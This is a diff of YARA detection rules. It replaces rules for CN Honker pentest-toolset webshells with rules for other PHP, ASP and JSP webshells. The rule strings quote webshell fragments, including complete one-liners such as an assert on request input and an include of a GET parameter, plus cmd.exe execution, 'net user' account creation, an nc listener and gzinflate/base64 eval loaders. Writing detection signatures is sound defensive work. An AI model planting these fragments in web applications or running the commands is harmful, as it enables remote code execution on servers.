 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c2f4b150f53c78777928921b3a985ec678bfae32"
-		logic_hash = "aadf47ac6231b41e720efdd85c481ebac8fccb572e57b86b27a95dd367c0d81b"
+		hash = "3919b959e3fa7e86d52c2b0a91588d5d"
+		logic_hash = "62cf46dc16a7365d196c2cb8ede8b1380a0877d134d3726d7c777096a4eda942"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "$sendbuf = \"site exec \".$_POST[\"SUCommand\"].\"\\r\\n\";" fullword ascii
-		$s8 = "elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_c" ascii
-		$s18 = "echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport" ascii
+		$s2 = " Echo \"<input type=button name=Submit onclick=\"\"document.location =&#039;\" &"
+		$s8 = " Echo \"document.Frm_Pack.FileName.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-"
 
 	condition:
-		filesize < 621KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Jspshell2 : FILE
+rule SIGNATURE_BASE_Webshell_Php_2
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file jspshell2.txt"
+		description = "Web Shell - file 2.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ff72f94b-1c0a-5615-b35f-35f69c920292"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L760-L775"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1846-L1859"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cc7bc1460416663012fc93d52e2078c0a277ff79"
-		logic_hash = "3a60991fa557655fbd2450739976ac612a0ea2a3df22873382b05438cac12762"
+		hash = "267c37c3a285a84f541066fc5b3c1747"
+		logic_hash = "bd485c825ae7ac11ff67d109d3c07fb405272a5919e00af39788d1a9c94e754d"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s10 = "if (cmd == null) cmd = \"cmd.exe /c set\";" fullword ascii
-		$s11 = "if (program == null) program = \"cmd.exe /c net start > \"+SHELL_DIR+\"/Log.txt" ascii
+		$s0 = "<?php assert($_REQUEST[\"c\"]);?> " fullword
 
 	condition:
-		filesize < 424KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Mysql : FILE
+rule SIGNATURE_BASE_Webshell_Asp_Cmdasp
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file mysql.aspx"
+		description = "Web Shell - file cmdasp.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fa0627fb-a40c-5856-ae78-17d33910878f"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L777-L791"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1860-L1874"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8e242c40aabba48687cfb135b51848af4f2d389d"
-		logic_hash = "bde2ea1ccfc88138456a1b255a32a7323f5ef0f677499db6dc6670987cc37585"
+		hash = "57b51418a799d2d016be546f399c2e9b"
+		logic_hash = "4259419b4db8e6a83df6f7d258d41028f7f76b0fd2308eeadb4555066c5a2940"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "txtpassword.Attributes.Add(\"onkeydown\", \"SubmitKeyClick('btnLogin');\");" fullword ascii
-		$s2 = "connString = string.Format(\"Host = {0}; UserName = {1}; Password = {2}; Databas" ascii
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+		$s7 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
 
 	condition:
-		filesize < 202KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php9 : FILE
+rule SIGNATURE_BASE_Webshell_Spjspshell
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php9.txt"
+		description = "Web Shell - file spjspshell.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c8cbee10-78ea-5a6f-9c80-7e51a9c38440"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L793-L807"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1875-L1888"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cd3962b1dba9f1b389212e38857568b69ca76725"
-		logic_hash = "bea117862ebc9220a4d9aee091c808274f9907fceb83b528055998ddcc90aa5f"
+		hash = "d39d51154aaad4ba89947c459a729971"
+		logic_hash = "7926eadd3ffb21de73a63e7a28a525037bf88396ea369599b41ac8c0b0d112ad"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Str[17] = \"select shell('c:\\windows\\system32\\cmd.exe /c net user b4che10r ab" ascii
+		$s7 = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:"
 
 	condition:
-		filesize < 1087KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Portrecall_Jsp : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Action
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file jsp.txt"
+		description = "Web Shell - file action.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cd34cb47-c5e0-5094-a501-6a8a00d94018"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L809-L823"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1889-L1903"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "65e8e4d13ad257c820cad12eef853c6d0134fce8"
-		logic_hash = "98f279c3e50308f67f88ecf8459943187ea152664fe0206c4a7d3435242df2a6"
+		hash = "5a7d931094f5570aaf5b7b3b06c3d8c0"
+		logic_hash = "5ea7d074d0fe98cf2514a65231013a374532d6b3aa2487bcc34d4285f558752a"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "lcx.jsp?localIP=202.91.246.59&localPort=88&remoteIP=218.232.111.187&remotePort=2" ascii
+		$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword
+		$s6 = "<%@ page contentType=\"text/html;charset=gb2312\"%>" fullword
 
 	condition:
-		filesize < 1KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx3 : FILE
+rule SIGNATURE_BASE_Webshell_Inderxer
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file aspx3.txt"
+		description = "Web Shell - file Inderxer.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4f835136-744a-5324-a1f4-02d1cfa2cab6"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L825-L840"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1904-L1917"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dd61481771f67d9593214e605e63b62d5400c72f"
-		logic_hash = "11bf511ee70ff4bde0a9320cb80dd9efa0f437d432c78a859153cfcc8e80db01"
+		hash = "9ea82afb8c7070817d4cdf686abe0300"
+		logic_hash = "915f2f38c1ca1321980ac66ebb95b0c46443e0ba64cc4b2014200db43439c85e"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Process p1 = Process.Start(\"\\\"\" + txtRarPath.Value + \"\\\"\", \" a -y -k -m" ascii
-		$s12 = "if (_Debug) System.Console.WriteLine(\"\\ninserting filename into CDS:" ascii
+		$s4 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
 
 	condition:
-		filesize < 100KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Shell_Shell : FILE
+rule SIGNATURE_BASE_Webshell_Asp_Rader
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file shell.aspx"
+		description = "Web Shell - file Rader.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8fbcae22-07b7-5afe-9f15-06e2f426b5ca"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L842-L857"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1918-L1932"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1816006827d16ed73cefdd2f11bd4c47c8af43e4"
-		logic_hash = "ac22d89353b4316289bf6c6e13332ac401f4b57f6c29b71861cb48359c1e55f9"
+		hash = "ad1a362e0a24c4475335e3e891a01731"
+		logic_hash = "b578f3e844cbb361f455e55353fad2f0134ede7c3c468cebad9ae265e6e768b8"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cook" ascii
-		$s1 = "<%@ Page Language=\"C#\" ValidateRequest=\"false\" %>" fullword ascii
+		$s1 = "FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0"
+		$s3 = "m\" target=inf onClick=\"window.open('?action=help','inf','width=450,height=400 "
 
 	condition:
-		filesize < 1KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell__Php1_Php7_Php9 : FILE
+rule SIGNATURE_BASE_Webshell_C99_Madnet_Smowu
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - from files php1.txt, php7.txt, php9.txt"
+		description = "Web Shell - file smowu.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cfc2f624-976f-5ff6-bd07-10948b9290bc"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L859-L878"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1933-L1951"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6ea5b362f8d8f2e99725d4dd4d2ada5c3939a45a3dde0084571600452ab4673c"
+		hash = "3aaa8cad47055ba53190020311b0fb83"
+		logic_hash = "5c4f76bdbe535a899e40c890eb1ea65e070c781fe5dd44cf13d4832cfd6d2e13"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "c2f4b150f53c78777928921b3a985ec678bfae32"
-		hash1 = "05a3f93dbb6c3705fd5151b6ffb64b53bc555575"
-		hash2 = "cd3962b1dba9f1b389212e38857568b69ca76725"
 
 	strings:
-		$s1 = "<a href=\"?s=h&o=wscript\">[WScript.shell]</a> " fullword ascii
-		$s2 = "document.getElementById('cmd').value = Str[i];" fullword ascii
-		$s3 = "Str[7] = \"copy c:\\\\\\\\1.php d:\\\\\\\\2.php\";" fullword ascii
+		$s0 = "//Authentication" fullword
+		$s1 = "$login = \"" fullword
+		$s2 = "eval(gzinflate(base64_decode('"
+		$s4 = "//Pass"
+		$s5 = "$md5_pass = \""
+		$s6 = "//If no pass then hash"
 
 	condition:
-		filesize < 300KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell__Serv_U_By_Goldsun_Asp3_Serv_U_Asp : FILE
+rule SIGNATURE_BASE_Webshell_Php_Moon
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - from files Serv-U_by_Goldsun.asp, asp3.txt, Serv-U asp.txt"
+		description = "Web Shell - file moon.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e91e05e8-0f6d-57a7-a649-a834733f17c8"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L880-L899"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1952-L1967"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b733e80f234a85a4f65eedd94f535860b4da464adb80a91afc547a8d96b5dc7a"
+		hash = "2a2b1b783d3a2fa9a50b1496afa6e356"
+		logic_hash = "4e26dbef647caee19a8707a067c228ba96bd986369e4c87c68964ae42c85b09a"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "d4d7a632af65a961a1dbd0cff80d5a5c2b397e8c"
-		hash1 = "87c5a76989bf08da5562e0b75c196dcb3087a27b"
-		hash2 = "cee91cd462a459d31a95ac08fe80c70d2f9c1611"
 
 	strings:
-		$s1 = "c.send loginuser & loginpass & mt & deldomain & quit" fullword ascii
-		$s2 = "loginpass = \"Pass \" & pass & vbCrLf" fullword ascii
-		$s3 = "b.send \"User go\" & vbCrLf & \"pass od\" & vbCrLf & \"site exec \" & cmd & vbCr" ascii
+		$s2 = "echo '<option value=\"create function backshell returns string soname"
+		$s3 = "echo      \"<input name='p' type='text' size='27' value='\".dirname(_FILE_).\""
+		$s8 = "echo '<option value=\"select cmdshell(\\'net user "
 
 	condition:
-		filesize < 444KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell__Asp4_Asp4_MSSQL__MSSQL_ : FILE
+rule SIGNATURE_BASE_Webshell_Minupload
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - from files asp4.txt, asp4.txt, MSSQL_.asp, MSSQL_.asp"
+		description = "Web Shell - file minupload.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e0070f0d-35d0-5024-88e7-e0e04b29f485"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L901-L921"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1969-L1983"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a8ec5ad87c83c16f47391c3ce08cee74c6be1e42c288eec6d1559867d28489c6"
+		hash = "ec905a1395d176c27f388d202375bdf9"
+		logic_hash = "53dea3ea0e2cf83907273fa7f64b21b40e9a5c8e4aa34e5d46d2762396fa89ce"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "4005b83ced1c032dc657283341617c410bc007b8"
-		hash1 = "4005b83ced1c032dc657283341617c410bc007b8"
-		hash2 = "7097c21f92306983add3b5b29a517204cd6cd819"
-		hash3 = "7097c21f92306983add3b5b29a517204cd6cd819"
 
 	strings:
-		$s0 = "\"<form name=\"\"searchfileform\"\" action=\"\"?action=searchfile\"\" method=\"" ascii
-		$s1 = "\"<TD ALIGN=\"\"Left\"\" colspan=\"\"5\"\">[\"& DbName & \"]" fullword ascii
-		$s2 = "Set Conn = Nothing " fullword ascii
+		$s0 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">   " fullword
+		$s9 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859"
 
 	condition:
-		filesize < 341KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell__Injection_Jmcook_Jmpost_Manualinjection : FILE
+rule SIGNATURE_BASE_Webshell_ELMALISEKER_Backd00R
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - from files Injection.exe, jmCook.asp, jmPost.asp, ManualInjection.exe"
+		description = "Web Shell - file ELMALISEKER Backd00r.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e154ecb5-9d56-520a-b76a-635a8864f0a8"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L923-L942"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1984-L1998"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0f3a4f81326154a6a6ac448d18be29ad534917bc39aba26cc458f06b43001681"
+		hash = "3aa403e0a42badb2c23d4a54ef43e2f4"
+		logic_hash = "c5eea930dc386c60e60f052c4945c8d6c0125d3500e60794e21d5ea04f226628"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "3484ed16e6f9e0d603cbc5cb44e46b8b7e775d35"
-		hash1 = "5e1851c77ce922e682333a3cb83b8506e1d7395d"
-		hash2 = "f80ec26bbdc803786925e8e0450ad7146b2478ff"
-		hash3 = "e83d427f44783088a84e9c231c6816c214434526"
 
 	strings:
-		$s1 = "response.write  PostData(JMUrl,JmStr,JmCok,JmRef)" fullword ascii
-		$s2 = "strReturn=Replace(strReturn,chr(43),\"%2B\")  'JMDCW" fullword ascii
+		$s0 = "response.write(\"<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio"
+		$s2 = "if FP = \"RefreshFolder\" or request.form(\"cmdOption\")=\"DeleteFolder\" or req"
 
 	condition:
-		filesize < 7342KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Cmfshell : FILE
+rule SIGNATURE_BASE_Webshell_PHP_Bug_1_
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file cmfshell.cmf"
+		description = "Web Shell - file bug (1).php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c5670deb-952c-5ba4-949a-097cc09bb108"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L944-L959"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1999-L2012"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b9b2107c946431e4ad1a8f5e53ac05e132935c0e"
-		logic_hash = "f138a82c2d6a831626fe200308eb89cb50ffeec2f2722599eb4ccbd082bad73d"
+		hash = "91c5fae02ab16d51fc5af9354ac2f015"
+		logic_hash = "12b957b7e0d0823721273ab71a19ee62d84a8dc5f584a46691f0e0aef996386e"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<cfexecute name=\"C:\\Winnt\\System32\\cmd.exe\"" fullword ascii
-		$s2 = "<form action=\"<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>\" method=\"post\">" fullword ascii
+		$s0 = "@include($_GET['bug']);" fullword
 
 	condition:
-		filesize < 4KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php4 : FILE
+rule SIGNATURE_BASE_Webshell_Caidao_Shell_Hkmjj
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php4.txt"
+		description = "Web Shell - file hkmjj.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "82446dff-dd1e-54a8-bb70-570bedc805b5"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L961-L975"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2013-L2026"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "179975f632baff6ee4d674fe3fabc324724fee9e"
-		logic_hash = "e625b6d1fd2c1e62306ccae2775ee7b53ddcdd7a6baef55b386dfcd92dc2e764"
+		hash = "e7b994fe9f878154ca18b7cde91ad2d0"
+		logic_hash = "9a25df170ed165fe6528e6b9374ae572bcd26cd2e1f4014c7aa4953122671fac"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "nc -l -vv -p port(" ascii
+		$s6 = "codeds=\"Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\"  " fullword
 
 	condition:
-		uint16( 0 ) == 0x4850 and filesize < 1KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Linux_2_6_Exploit : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Asd
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file 2.6.9"
+		description = "Web Shell - file asd.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "22e2aca7-418f-598f-af0c-99942aaf3278"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L977-L991"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2027-L2041"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ec22fac0510d0dc2c29d56c55ff7135239b0aeee"
-		logic_hash = "7f3e2937796358a949ce980210ddeb1a606a7b9c2b4d9c4a4acad49bb556dfc8"
+		hash = "a042c2ca64176410236fcc97484ec599"
+		logic_hash = "6620b796b55a67010cd3edebc2ec84c2657717722129ea46288d262cfd1c7e1c"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "[+] Failed to get root :( Something's wrong.  Maybe the kernel isn't vulnerable?" fullword ascii
+		$s3 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%>" fullword
+		$s6 = "<input size=\"100\" value=\"<%=application.getRealPath(\"/\") %>\" name=\"url"
 
 	condition:
-		filesize < 56KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp2 : FILE
+rule SIGNATURE_BASE_Webshell_Metaslsoft
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file asp2.txt"
+		description = "Web Shell - file metaslsoft.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5296405-c345-55dc-acd9-be6aca86c60b"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L993-L1009"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2043-L2056"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b3ac478e72a0457798a3532f6799adeaf4a7fc87"
-		logic_hash = "6107afe9895c4e0c865e78bece160246815a0d3c589bfc79f8b369b94481cd89"
+		hash = "aa328ed1476f4a10c0bcc2dde4461789"
+		logic_hash = "20d938fbe21bcf04f09c6450a9acd5db556e9c9f83149d3cdd098be7a905d5ca"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<%=server.mappath(request.servervariables(\"script_name\"))%>" fullword ascii
-		$s2 = "webshell</font> <font color=#00FF00>" fullword ascii
